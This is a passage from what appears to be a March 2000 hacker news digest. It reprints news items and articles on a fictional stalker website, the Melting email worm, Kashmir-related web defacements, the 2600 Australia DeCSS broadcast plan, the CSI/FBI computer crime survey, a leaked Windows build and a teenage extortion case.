You'd rather not go through the hassle of moving toward less dirigisme. It's so much easier to keep paying bribes. The Central Intelligence Agency collects other economic intelligence, but the vast majority of it is not stolen secrets. The Aspin-Brown Commission four years ago found that about 95% of U.S. economic intelligence comes from open sources. The Campbell report describes a sinister-sounding U.S. meeting in Washington where -- shudder! -- CIA personnel are present and the participants -- brace yourself -- "identify major contracts open for bid" in Indonesia. Mr. Campbell, I suppose, imagines something like this: A crafty CIA spy steals stealthily out of a safe house, changes disguises, checks to make sure he's not under surveillance, coordinates with a spy satellite and . . . buys an Indonesian newspaper. If you Europeans really think we go to such absurd lengths to obtain publicly available information, why don't you just laugh at us instead of getting in high dudgeon? What are the economic secrets, in addition to bribery attempts, that we have conducted espionage to obtain? One example is some companies' efforts to conceal the transfer of dual-use technology. We follow sales of supercomputers and certain chemicals closely, because they can be used not only for commercial purposes but for the production of weapons of mass destruction. Another is economic activity in countries subject to sanctions -- Serbian banking, Iraqi oil smuggling. But do we collect or even sort secret intelligence for the benefit of specific American companies? Even Mr. Campbell admits that we don't, although he can't bring himself to say so except with a double negative: "In general this is not incorrect." The Aspin-Brown Commission was more explicit: "U.S. Intelligence Agencies are not tasked to engage in 'industrial espionage' -- i.e. obtaining trade secrets for the benefit of a U.S. company or companies." The French government is forming a commission to look into all this. I hope the commissioners come to Washington. We should organize two seminars for them. One would cover our Foreign Corrupt Practices Act, and how we use it, quite effectively, to discourage U.S. companies from bribing foreign governments. A second would cover why Adam Smith is a better guide than Colbert for 21st-century economies. Then we could move on to industrial espionage, and our visitors could explain, if they can keep straight faces, that they don't engage in it. Will the next commission pursue the issue of rude American maitre d's? Get serious, Europeans. Stop blaming us and reform your own statist economic policies. Then your companies can become more efficient and innovative, and they won't need to resort to bribery to compete. And then we won't need to spy on you. @HWA 48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Rho The Computer Crimes Division of the L.A. County Sheriff's Department has forced www.fortheloveofjulie.com to alter its content. Fearing that the fake stalking site was a little too real and that it could hamper probes of real crimes they strongly suggested that the owner make changes to the site or take it down. The site is meant to be entertaining and spooky similar to 'The Blair Witch Project'. CNN http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html Authorities tell faux-stalker site to tone it down March 17, 2000 Web posted at: 8:46 p.m. EST (0146 GMT) By D. Ian Hopper CNN Interactive Technology Editor (CNN) -- After getting over 2 million page views, the authors of a faux-stalker site got a call from someone who wasn't such a fan -- a police detective. A detective from the Computer Crimes Division of the L.A. County Sheriff's Department contacted Spark Factory president Tim Street Friday. According to authorities, the detective strongly suggested that Street take down FortheloveofJulie.com, a fake stalker site that aims to be an entertaining but spooky story in the tradition of last year's "The Blair Witch Project" phenomenon. The site is a shrine to "Julie" from her admirer, a video-store clerk who follows her home and to her work, taking videos and posting a journal complete with movie clips and pictures. The site has become very popular, Street says, through both word-of-mouth and media attention. While it's completely fake, many users failed to see a disclaimer because they're going through a publicized back door that bypasses SpookySites.com, where it's indexed. SpookySites contains a small disclaimer upon entering the site that informs users that the content within "may contain fictionalization." But like many others, the detective entered the site through a back door, missing the disclaimer. When he called Street, the site's author was skeptical. "He told me he was with the police department. I wanted to call him back to make sure, because practical jokes around here are running rampant," Street said. "One guy here said he was from the FBI." "We received a tip from an investigator on the East Coast," says Sgt. Larry Balich. Authorities found a photo in the site that clearly showed a vehicle and license plate, and traced it back to Street. "We thought we had a stalking situation on our hands," Balich says. "But we needed a victim. You can't investigate a case without a victim or witness, and we had neither." After contacting the district attorney's office, detectives found that no crime had been committed. Still, Street says, police "strongly suggested" that he take the site down or close the back door and make the disclaimer more obvious. "We're going to frame it inside CreepySites," Street said. "We'll have a bolder disclaimer that says FortheloveofJulie is fictitious, and Julie is not in any danger." "We don't think we have to," he says, "but we don't want to have any problems." Balich says the site was just a little too real and could hamper probes of real crimes. "It's troublesome to have something like this on the Internet," Balich says. "I consider it a misuse of a real positive thing." The site was taken down for most of the day but came back up in the afternoon with the intended changes. Street says he made the site as an "Internet soap opera" meant to entertain users who were in for a suspenseful thrill. "It's not our intent to be evil, creepy people," he says. "We're trying to showcase how this new experience can change entertainment on the Internet." Street says he has already left a message with the FBI to try to head off any more misunderstandings. @HWA 49.0 HNN:Mar 20th:New Windows Worm Virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne A new worm virus that can shut down MS Windows platforms and make the operating system permanently unusable has been discovered by Computer Associates International. Once launched via MS Outlook under Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves itself into a Windows directory under the name MeltingScreen.exe. It renames .exe files into .bin files. PC World http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html Windows ‘Worm’ Virus Slithers Computer Associates identifies virus that travels through Outlook. by Kathleen Ohlson, Computerworld March 17, 2000, 6:56 a.m. PT A new worm now "in the wild" has the potential to shut down Windows platforms and make the operating system permanently unusable. Computer Associates International discovered the worm, Win32/Melting.worm, on Tuesday, when customers started to find it in their e-mail systems, says Narender Mangalam, director of security solutions at CA. So far, it has hit some Fortune 1000 software companies, he says. "The risk level is moderate, and it hasn't caused too much damage because we believe we've caught it in time," Mangalam says. CA markets InoculateIT, a virus detection and prevention program. The Melting Worm is unleashed through Microsoft's Outlook running on Windows 95, 98, 2000, or NT, according to CA representatives. Once launched, the worm puts a copy of itself into a Windows directory as MeltingScreen.exe and remains in memory. Files with .exe extensions in a system's Windows directory are renamed with .bin extensions. As the worm renames files, including ones critical to operating Windows, these changes may render the operating system useless. The worm also starts to e-mail itself to all the names in a victim's Outlook address book and randomly executes other .exe files, Mangalam says. This potentially can take down a company's e-mail system. @HWA 50.0 HNN:Mar 20th:GNIT Now Freeware ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by m0nk Ellicit Organization has released a freeware version of their latest program, GNIT NT Vulnerability Scanner. The scanner checks for over a dozen NT vulnerabilities. Ellicit.org http://security.ellicit.org/ @HWA 51.0 HNN:Mar 20th:Online Criminals Labeled Boffins ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dogcow The Australian Federal Police Commissioner, Mick Palmer, was recently quoted as saying that while much of online crime is currently "in the early stages it is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent." (Glad to see that Australia is on top of Internet crime.) Sydney Morning Herald http://www.smh.com.au/news/0003/18/national/national6.html NATIONAL 'Police must get ahead of e-crime' By JANINE ISRAEL Undetected organised electronic-crime could undermine the nation's security and financial stability, the Australian Federal Police Commissioner, Mr Mick Palmer, warned yesterday. He told a conference of Australasian and south-west Pacific police commissioners in Canberra that a co-ordinated international response was required urgently to crack down on electronic terrorism, child pornography, racism, fraud and money laundering. Mr Palmer said the Internet meant crimes were being committed in countries where perpetrators had "never set foot" and international legislation and treaties must be set up to prosecute criminals irrespective of national borders. Australia, New Zealand, Fiji and Papua New Guinea police commissioners announced they would establish an Australasian Law Enforcement Electronic Crime Strategy to address the issue. Mr Palmer said the Australian police force lacked electronic expertise, and were looking to recruit computer boffins to tackle electronic crime. "We need to be buying those skills from the cutting edge of the technological workplace. We need to form close partnerships with the private sector and wider government agencies," he said. But employing people with the skills to fight electronic crime was costly. Retention was a problem in a competitive market where those with technological skills were lured by high salaries to the private sector. The international nature of cyberspace made it almost impossible to identify perpetrators let alone snare electronic criminals. Credit card fraud already was costing the credit card industry billions, Mr Palmer said. He said growing forms of e-crime included such things as money laundering and tax evasion. Cyber-stalking, illegal interceptions or "electronic eavesdropping" were a concern, as were political and industrial espionage. Fraudulent sales pitches along with bogus charitable or investment solicitations were increasingly common. These were not necessarily "new crimes", Mr Palmer said, just "new methods to commit traditional crimes". "One of the difficulties with electronic crime is that not only is it very intrusive and superficially invisible, but many crimes can be committed without the victim knowing it has been committed," he said. While e-crime is still in its "embryo state", authorities predict it will expand with the electronic market to become more organised and sophisticated. "Much of it in the early stages is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent. The damage caused by those activities is of course equally serious," he said. He said police were "alarmed" by the capability of people to commit offences on a global basis, with complete anonymity, with speed and on a large scale. A staggering 900 million people were expected to be using the Internet by the end of the year. @HWA 52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre Over 600 web sites in India including government systems have been defaced in recent months by people in Pakistan. The conflict in Kashmir is seen as one of the primary reasons for the defacements. CNN http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html Kashmir conflict continues to escalate -- online By D. Ian Hopper CNN Interactive Technology Editor March 20, 2000 Web posted at: 8:15 p.m. EST (0115 GMT) (CNN) -- A group of Pakistani hackers has used the conflict in Kashmir as a reason to deface almost 600 Web sites in India and take control of several Indian government and private computer systems, according to the group. A computer security Web site -- attrition.org -- has records of the defacements claimed by the Muslim Online Syndicate. The M0S, which a member says consists of mostly Pakistani Muslims, is made up of self-proclaimed "hacktivists," those who commit computer crimes -- ranging from simple defacement to full-scale intrusions to denial of service attacks -- in order to bring attention to a social cause. The group has nine active members, according to a representative who spoke on behalf of the group on condition of anonymity. They range from 16 to 24 years old, the representative said. Several of them are students or computer professionals, and one is a medical student, the representative added. Unlike the majority of Web vandals, the MOS members say they secretly take control of a server, then deface the site only when they "have no more use" for the data or the server itself. "The servers we control range from harmless mail and Web services to 'heavy duty' government servers," says the MOS representative. "The data is only being categorically archived for later use if deemed necessary." The group says it's not interested in e-commerce sites or credit card information. Most of the group's defacements came in one fell swoop, when they broke into India's largest Internet service provider, IndiaLinks. While there, they defaced more than 500 sites hosted by the company, including many travel and company sites, IndiaLinks confirms. IndiaLinks, based in Bombay, hosts more than 6,000 Web sites, according to CEO Bhavin Chandarana. Chandarana says the group had access to servers co-hosted by Alabanza, an American ISP. He says the group had access for about an hour. The MOS won't be facing any legal problems stemming from its exploits, Chandarana says, because IndiaLinks was not able to get the server logs from Alabanza. Chandarana says his company is in the process of removing their business from the U.S. ISP. Representatives for Alabanza did not respond to several e-mails and two phone messages requesting comment. One of the Web sites defaced was that of the Indian Science Congress 2000. The ISC's local organizing secretary, Bhushan Patwardhan, told The Hindu newspaper that the defacement was removed as soon as it was detected. The MOS has a Web site mirroring its attacks that contains a well-known expletive. Expletives in domain names used to be taboo, but with the deregulation of domain registration, it is no longer forbidden. "We hope to bring the Kashmir conflict to the world's attention," MOS says. "We wish to see the day when our Muslim brethren will be given the right to choose, as was promised them half a century ago." India and Pakistan have fought two wars over the last half-century over rival claims for the Himalayan territory of Kashmir. They clashed again last summer when Pakistan-based fighters seized mountain peaks inside India. Hundreds of militants died before India and Pakistan -- under international and domestic pressure -- withdrew their forces. Ignoring world pressure, India and Pakistan both tested nuclear devices in 1998, dramatically escalating tensions. The stated goal of the MOS -- social action through hacking -- is becoming a more popular one. Hacktivists attacked the World Trade Organization Web site during their Seattle conference last year, and a mailing list helps concerned activists discuss strategy, targets and coordinate attacks. Rather than simply defacing sites, denial of service attacks have become the weapon of choice. Alex Fowler, Strategic Initiatives Director for the Electronic Frontier Foundation, predicted this escalation in October 1999 in an interview with CNN Interactive. "We will see very serious attacks. Information stealing could have very long-term consequences for consumers," Fowler said. @HWA 53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Army Maj. Sheryl French has said that the possibility exists for intruders to infiltrate the computer systems used in tanks and other armored vehicles. Modern tanks and ships make extensive use of computers, software and data communications links for functions such as navigation, targeting and command and control. DISA has already tested the possibility of inputting false navigation data into a ships computer from an unauthorized land based laptop. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp Hacker-controlled tanks, planes and warships? BY Dan Verton 03/21/2000 Army officials are worried that sophisticated hackers and other cybercriminals, including military adversaries, may soon have the ability to hack their way into and take control of major military weapon systems such as tanks and ships. Speaking this month at the annual Army Directors of Information Management Conference in Houston, Army Maj. Sheryl French, a program manager responsible for the Army’s Information Assurance Architecture for the Digitized Force, said the potential exists for hackers to infiltrate the computer systems used in tanks and other armored vehicles. Unlike in the past, today’s modern tanks and ships are almost entirely dependent on computers, software and data communications links for functions such as navigation, targeting and command and control. Although the Pentagon has always had computer security issues to deal with, "we’ve never had computers" in tanks and armored personnel carriers before, said French, pointing to a picture of an M-1 Abrams Main Battle Tank. In fact, the Defense Department has already tested and proven that hackers have the ability to infiltrate the command and control systems of major weapons, including Navy warships. According to a training CD-ROM on information assurance, published by the Defense Information Systems Agency, an Air Force officer sitting in a hotel room in Boston used a laptop computer to hack into a Navy ship at sea and implant false navigation data into the ship’s steering system. "Yes, this actually happened," the CD-ROM instructs military personnel taking the course. "Fortunately, this was only a controlled test to see what could be done. In reality, the type of crime and its objective is limited only by people’s imagination and ability." John Pike, a defense and intelligence analyst with the Federation of American Scientists, said that although there are well-known security gaps in the commercial systems that the Army plans to use on the battlefield, hacking into tanks and other weapons may prove to be too difficult for an enemy engaged in battle. "The problem for the enemy is that computer security vulnerabilities will almost certainly prove fleeting and unpredictable," said Pike, adding that such tactics would be nearly impossible to employ beyond the random harassment level. @HWA 54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by hool In yet another twist in the MPAA vs. DeCSS case 2600 of Australia plan to broadcast the source code of DeCSS on national TV. Australian Federal copyright laws can not currently prevent this broadcast. The information will be displayed at 12 frames per second, it is recommended that viewers tape record the information and review it later frame by frame. The code is expected to air sometime in the next few weeks between 3 and 4 am. Computerworld AU http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument 2600 AU http://www.2600.org.au ComputerWorld; Hackers with heart By Byron Kaye 13 March, 2000 SYDNEY - Loopholes in Federal laws mean hacker advocate group 2600 Australia will be able to broadcast DVD decryption codes and other sensitive information on national television within weeks. Grant Bayley, who heads up 2600 Australia, the international organisation's Australian operation, said it was currently devising a 15-second broadcast, which he said would contain text files, delivered at 12 frames per second, and suggestions pertaining to the "ethics" of datacasting, computer security and privacy, and access-controlling DVD encryption. Bayley said the text contained in the broadcast would not be comprehensible as it appeared live on television, but he suggested viewers record the broadcast on video and then watch the information afterwards "frame by frame". Bayley said the broadcast would be "fed" to Channel 10 by MindShare, a company that supplies advertising material in bulk for the television station. MindShare's own advertising slogan is "Head space invaders". The broadcast time was not yet known, but Bayley said it was expected to screen between 3:00 and 4:00 am "some time in the next few weeks". Bayley maintained information contained in the broadcast would "primarily encourage ethical", educational use of new technologies such as datacasting. However, he admitted some information -- pertaining to the decryption of DVD access codes -- which could not be legally broadcast in the US, would be screened. Australian Federal copyright laws, even those currently being amended, were unable to prevent broadcasting of information such as DVD decryption codes, regardless of how commercially crippling the information might potentially be, he said. Bayley said he was convinced that he knew the 15-year-old hacker who penetrated the ASX website two weeks ago "pretty well". The ASX hack caused an outage of four hours, leaving the site littered with banner messages reading "Prosthetic owns the ASX". Bayley maintained 2600 did not support or encourage vandalistic hack attacks such as this. "Stupid people do stupid things," he said. The title "2600" refers to the frequency of pitch that technology-savvy Americans played into their telephone receivers to thwart long distance call charges in the early 1980s. @HWA 55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The CIA's Foreign Bureau of Information Services policy allowing agency officials to monitor employees' Internet use has been upheld by federal appeals court. The policy included provisions to review employees' e-mail messages and to collect information on their Web site visits. The policy had helped convict a federal employee of downloading child pornography on government time. Government Executive Magazine http://www.govexec.com/dailyfed/0300/032000m1.htm March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp. (SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS. FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive. Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail. The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized." According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law." The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html. @HWA 56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by rootfest RootFest is back for its second try. RootFest 2000 will be June 14-16, 2000, and will be held at the brand-new St. Paul RiverCentre facility just 15 minutes from the Mall of America. Three days of speakers, events, contests and more is planned, making this a can't-miss event. RootFest http://www.rootfest.org/ @HWA 57.0 HNN:Mar 22nd:Cybercrime On The Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Computer Security Institute and the San Francisco FBI Computer Intrusion Squad jointly released a report today that said that electronic crime cost companies at least $266 million last year. The study found that 70% of the responding companies detected the unauthorized use of their computer systems in the last 12 months up from 62% the year before. Insiders and disgruntled employees topped the lists of worrisome security threats. (One conclusion that can be drawn form this study is that e-crime is on the rise, another is that people are more willing to admit intrusions or that detection of criminal activity has gotten better. The numbers are interesting but really don't say anything.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop Late Update 0943EST An anonymous person was kind enough to send us a link directly to the summary results of the above mentioned survey. Computer Security Institute http://www.gocsi.com/prelea_000321.htm ZDNet; Report: 'E-crime is booming' Some 70 percent of companies queried in a new study have detected attacks on their networks, the FBI/CSI reports. By Robert Lemos, ZDNet News UPDATED March 22, 2000 10:00 AM PT SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming business, according to a survey released by the Computer Security Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday. The study found that 70 percent of CSI's 585 member companies that responded to its survey detected the unauthorized use of their computer systems in the last 12 months -- up from 62 percent the year before. "Isn't e-commerce booming? Then e-crime is booming," said Richard Power, editorial director and analyst for the Computer Security Institute. "The Internet revolution is going on regardless, but the more commerce that goes online, the more crime that goes online as well." While not a scientific estimate of computer crime, the report does measure the anonymous admissions of more than 640 security professionals who are part of CSI. Insiders the biggest fear More than three-quarters of those professionals identified hackers as a security threat, but insiders concerned the respondents more, with 81 percent worried about disgruntled employees. CSI's Power explained that professional hackers are more of a threat, however. "That's the real problem, not a juvenile hacker," he said. "The point is, if a 16-year-old kid can do (what we have seen), then what are the professionals doing?" The report also indicates that corporate computer systems are far from secure. Almost 90 percent of the security professionals who answered the survey detected a security threat, which includes unauthorized access as well as improper use of a corporate computer or e-mail and computer viruses. Of those intrusions, only 42 percent of the companies affected put a dollar sign on the amount of damage done. The total: $266 million. With only one computer security administrator per 1,000 computers, the situation may not get any better soon. -=- CSI; Mar 22,2000 FOR IMMEDIATE RELEASE Contact: Patrice Rapalus, Director Computer Security Institute 600 Harrison Street San Francisco, CA 94107 415/905-2310 Internet: prapalus@cmp.com Ninety percent of survey respondents detect cyber attacks, 273 organizations report $265,589,940 in financial losses SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the results of its fifth annual "Computer Crime and Security Survey." The "Computer Crime and Security Survey" is conducted by CSI with the participation of the San Francisco Federal Bureau of Investigation's (FBI) Computer Intrusion Squad. The aim of this effort is to raise the level of security awareness, as well as help determine the scope of computer crime in the United States. Highlights of the "2000 Computer Crime and Security Survey" include the following: Ninety percent of respondents (primarily large corporations and government agencies) detected computer security breaches within the last twelve months. Seventy percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse"--for example, theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks. Seventy-four percent acknowledged financial losses due to computer breaches. Forty-two percent were willing and/or able to quantify their financial losses. The losses from these 273 respondents totaled $265,589,940 (the average annual total over the last three years was $120,240,180). Financial losses in eight of twelve categories were larger than in any previous year. Furthermore, financial losses in four categories were higher than the combined total of the three previous years. For example, 6I respondents quantified losses due to sabotage of data or networks for a total of $27,148,000. The total financial losses due to sabotage for the previous years combined totaled only $10,848,850. As in previous years, the most serious financial losses occurred through theft of proprietary information (66 respondents reported $66,708,000) and financial fraud (53 respondents reported $55,996,000). Survey results illustrate that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming the trend in previous years. Seventy-one percent of respondents detected unauthorized access by insiders. But for the third year in a row, more respondents (59%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (38%). Based on responses from 643 computer security practitioners in U.S. corporations, government agencies, financial institutions, medical institutions and universities, the findings of the "2000 Computer Crime and Security Survey" confirm that the threat from computer crime and other information security breaches continues unabated and that the financial toll is mounting. Respondents detected a wide range of attacks and abuses. Here are some other examples: 25% of respondents detected system penetration from the outside. 27% of respondents detected denial of service attacks. 79% detected employee abuse of Internet access privileges (for example, downloading pornography or pirated software, or inappropriate use of e-mail systems). 85% detected computer viruses. For the second year, we asked some questions about electronic commerce over the Internet. Here are some of the results: 93% of respondents have WWW sites. 43% conduct electronic commerce on their sites (in 1999, only it was only 30%). 19% suffered unauthorized access or misuse within the last twelve months. 32% said that they didn't know if there had been unauthorized access or misuse. 35% of those acknowledging attack, reported from two to five incidents. 19% reported ten or more incidents. 64% of those acknowledging an attack reported Web-site vandalism. 60% reported denial of service. 8% reported theft of transaction information. 3% reported financial fraud. Patrice Rapalus. CSI Director, suggests that the "Computer Crime and Security Survey," now in its fifth year, has delivered on its promise to raise the level of security awareness and help determine the scope of crime in the United States. "The trends the CSI/FBI survey has highlighted over the years are disturbing. Cyber crimes and other information security breaches are widespread and diverse. Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. The 273 organizations that were able to quantify their losses reported a total of $265,589,940. Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly adequate staffing and training of information security practitioners in both the private sector and government." Bruce J. Gebhardt is in charge of the FBI's Northern California office. Based in San Francisco, his division covers fifteen counties, including the continually expanding "Silicon Valley" area. Computer crime is one of his biggest challenges. "If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen. The results of the CSI/FBI survey provide us with valuable data. This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level but identifies emerging crime trends and helps me decide how best to proactively, and aggressively assign resources, before those 'trends' become 'crises.'" ### CSI, established in 1974, is a San Francisco-based association of information security professionals. It has thousands of members worldwide and provides a wide variety of information and education programs to assist practitioners in protecting the information assets of corporations and governmental organizations. The FBI, in response to an expanding number of instances in which criminals have targeted major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC) located at FBI headquarters and the Regional Computer Intrusion Squads located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyber attacks on the nation's infrastructures. (These infrastructures include telecommunications, energy, transportation, banking and finance, emergency services and government operations). The mission of Regional Computer Intrusion Squads is to investigate violations of Computer Fraud and Abuse Act (Title 8, Section 1030), including intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes Copyright 2000 Computer Security Institute 600 Harrison Street San Francisco, CA 94107 Telephone: (415) 905-2626 Fax: (415) 905-2218. @HWA 58.0 HNN:Mar 22nd:The Next Version of Windows Leaked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench While Windows 2000 only just recently shipped Microsoft is already working on the next generation of the operating system. Code named Whistler, build 2211.1 has been liberally spread around pirate sites across the net. Beta News http://betanews.efront.com/article.php3?sid=953595359 ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop Beta; Whistler Hits the Web By Nate Mook, eFront March 20th, 2000, 6:35 PM An internal build of Microsoft's future operating system, set to combine consumer and business versions into a product currently codenamed Whistler Windows 2001, has leaked out onto the Internet. Build number 2211.1 was posted onto various college and Internet sites early this morning and spread as per usual, like wildfire. While the new operating system currently looks almost identical to Windows 2000, a number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users. For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options. Whistler does contain the infamous MarsCore.DLL file which started rumors last month regarding the purpose of Mars, now known to be part of the future version of Microsoft's MSN client. However, it is unknown whether or not the new HTML folders are part of the Mars core or if users will be given the opportunity to switch off more user friendly parts of the operating system. As usual with an early Alpha release, most new features and enhancements will not be added until Beta 1. Keep checking back for continued coverage regarding Microsoft Whistler. ActiveWin contributed to this report. -=- ZDNet; Windows 2001 leaked on the Web A pirated version of Windows 2001 is winding its way across the Net. And it looks a lot like today's Windows. By Mary Jo Foley, ZDNet News UPDATED March 21, 2000 2:03 PM PT Microsoft Corp.'s next full-fledged version of Windows, code-named Whistler, is at least a year away from release -- but already a pirated version of one of the latest builds has found its way onto the Net. As reported by the Windows enthusiast sites ActiveWin and BetaNews, a recent internal build of Whistler has been posted illegally to a number of college and Internet sites. ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday morning and "spread as per usual, like wildfire." Whistler is the code name for the first full-fledged upgrade to Windows 2000 that will be based on the Windows NT kernel, rather than the Windows 9X kernel. (The Windows 9X update is code-named Millennium and expected to ship in the third or fourth quarter of this year.) Whistler is tentatively slated to ship in March 2001, according to internal Microsoft documents. Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the development process. But sources close to the company say the latest "stable" internal developers build is numbered 2207. The most recent internal test build is 2214, sources add. A Microsoft spokesman said the company was investigating reports of pirated Whistler builds but would make no further comment. Looks like Win2000 -- so far As noted by ActiveWin, the pirated Whistler build looks almost identical to Windows 2000 Professional. "A number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users," ActiveWin reported. "For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options." One change under the hood, according to ActiveWin, is the inclusion of the MarsCore.DLL file. "Mars" is the code name for user interface technology slated to be included in a future version of Microsoft's MSN client. At one point, Mars was used as the code name for the next version of a consumer-oriented version of Internet Explorer. After signing up Mars beta testers last fall, Microsoft sent out a note telling testers it had delayed the start of the beta because the company was "rethinking some of our most basic assumptions" regarding the future user interfaces. It isn't just in the user interface that Microsoft has been redrawing its Windows road map. In January, Microsoft acknowledged that it had tabled work on "Neptune," a consumer version of Windows slated to follow Millennium, and on "Odyssey," an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it planned to merge the Neptune and Odyssey code bases in the form of Whistler. The follow-on to Whistler, code-named Blackcomb, is expected to ship in 2002 or later. @HWA 59.0 HNN:Mar 22nd:Toronto Business Held For Extortion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An unnamed business in the Toronto area was held for ransom of less than $5,000 after a 14 year old youth took control of the companies chat-room and email servers. Police arrested the individual after arranging a meeting to deliver the money. The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production and possession of counterfeit money, and two counts of unauthorized use of a computer. (And they say there are not enough computer crime laws.) National Post http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news Wednesday, December 22, 1999 14-year-old computer whiz charged after company given extortion demand Arrested in Keswick Chris Eby National Post A 14-year-old computer whiz, who allegedly hacked into the accounts of a downtown Toronto business and tried to extort the owners, was charged yesterday with a raft of extortion and counterfeiting-related offences after a police sting operation. The boy, who cannot be named under the Young Offenders Act, took control of the business's e-mail and chat rooms -- two operations vital to the business' survival -- for two weeks. He contacted the owner of the business through the Internet, demanding cash before he returned control of the accounts. "He obviously displays a capability in computers that appears to be above average," said Detective Myron Demkiw. "They're pretty serious offences ... this is all relatively new ground for everybody." The owner of the business contacted police, who traced the suspect to Keswick, a town 60 kilometres north of Toronto. Investigators arranged a meeting on Monday where the suspect was supposed to receive the money he was demanding (a sum less than $5,000 was all police would say), and was arrested. "He was calm throughout," Det. Demkiw said of the youth. As a result of the investigation, detectives executed a search warrant on the boy's home and seized his computer, related documents, and some counterfeit money. When asked if he had ever come across anything like this, Det. Demkiw replied: "No, never, and and this will be something new to the courts as well." The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production of counterfeit money, and two counts each of unauthorized use of a computer, and possession of counterfeit money. @HWA 60.0 HNN:Mar 22nd:Is the Census Secure? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The long 